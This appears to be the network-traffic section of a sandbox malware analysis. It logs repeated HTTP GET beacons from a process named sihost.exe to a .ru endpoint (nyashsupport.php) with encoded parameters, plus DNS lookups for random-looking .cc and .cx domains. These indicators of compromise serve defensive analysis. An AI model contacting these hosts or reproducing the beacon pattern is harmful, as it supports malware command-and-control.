http://81888.cllt.nyashteam.ru/nyashsupport.php?JADrUWbDjE0=2S2HLDCHlF5gkx16&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&JADrUWbDjE0=2S2HLDCHlF5gkx16

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?JADrUWbDjE0=2S2HLDCHlF5gkx16&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&JADrUWbDjE0=2S2HLDCHlF5gkx16 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:18:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tr%2BTn2Iyiuv9DlHpKHxWZp1EzfCDhJOxpUQntXDeqK%2FeoquGjuIO8ejtHQBTzWGQ%2FKmTFsrYHuHbGyuoz8fViZEnnQGg5EUT8F0CiynXnpvmy%2FQ5W0O3pXPh1KG2vYcsVt6qMZatXI3JaA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20865eafd43854-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?JADrUWbDjE0=2S2HLDCHlF5gkx16&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&JADrUWbDjE0=2S2HLDCHlF5gkx16

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?JADrUWbDjE0=2S2HLDCHlF5gkx16&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&JADrUWbDjE0=2S2HLDCHlF5gkx16 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:18:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NWjlX%2BfHG9gYcZkW0R2X5AG2dgLTYrAW%2BPw5DNfJBGq7HJrIKJprYvd3YF4Gf%2BlHdk8IBeGvnWGzlAWeT4ACzbWDN93ONX6Ixsvev%2BwzxXiE4c2Ci0BWKSscH4fqjRdCMfn1QLWrCQ6hUg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20865fe9b83854-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:18:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F9mdOaw6VG587lyFonrlxvcW18ILlixvAaL8czfrIMYpjA8RiWuIrYBp3Hu1fdobM0c30GrxSXVjbgrrOYC641H4ZP4oykkQbHPKVPVBPqZ2JkgBfnAsUXKFkjbhMSw4NW%2F8soBH%2BzmPEw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20867f0a0e779b-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:18:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WeKgntZ%2BJPagdms%2F8B8xD6yijoT3XwsLRG%2FmSnZ%2BOijGdd5wD%2B03AIiABsLJJ1x8M8chg%2Bpz7VTpY5dYCEArfm44Arbbwv5ETtjU2YSN%2FwZZSKtSgWjSAUJCTPjAMFZYMsHubkUP9FKKcg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2086805b5a779b-LHR
alt-svc: h3=":443"; ma=86400
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response

104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM

http

sihost.exe

1.2kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?rWRA=FCxTfIgsg3jlRqQsf2hs0A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&rWRA=FCxTfIgsg3jlRqQsf2hs0A

http

sihost.exe

1.1kB
1.6kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?rWRA=FCxTfIgsg3jlRqQsf2hs0A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&rWRA=FCxTfIgsg3jlRqQsf2hs0A

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?rWRA=FCxTfIgsg3jlRqQsf2hs0A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&rWRA=FCxTfIgsg3jlRqQsf2hs0A

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz

http

sihost.exe

1.4kB
1.6kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL

http

sihost.exe

1.6kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6

http

sihost.exe

1.6kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC

http

sihost.exe

1.5kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13

http

sihost.exe

1.4kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2

http

sihost.exe

1.3kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o

http

sihost.exe

1.4kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?JADrUWbDjE0=2S2HLDCHlF5gkx16&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&JADrUWbDjE0=2S2HLDCHlF5gkx16

http

sihost.exe

1.2kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?JADrUWbDjE0=2S2HLDCHlF5gkx16&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&JADrUWbDjE0=2S2HLDCHlF5gkx16

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?JADrUWbDjE0=2S2HLDCHlF5gkx16&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&JADrUWbDjE0=2S2HLDCHlF5gkx16

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM

http

sihost.exe

1.5kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzvKvA0eneaIJiLM

HTTP Response

404

8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

36.56.20.217.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

36.56.20.217.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

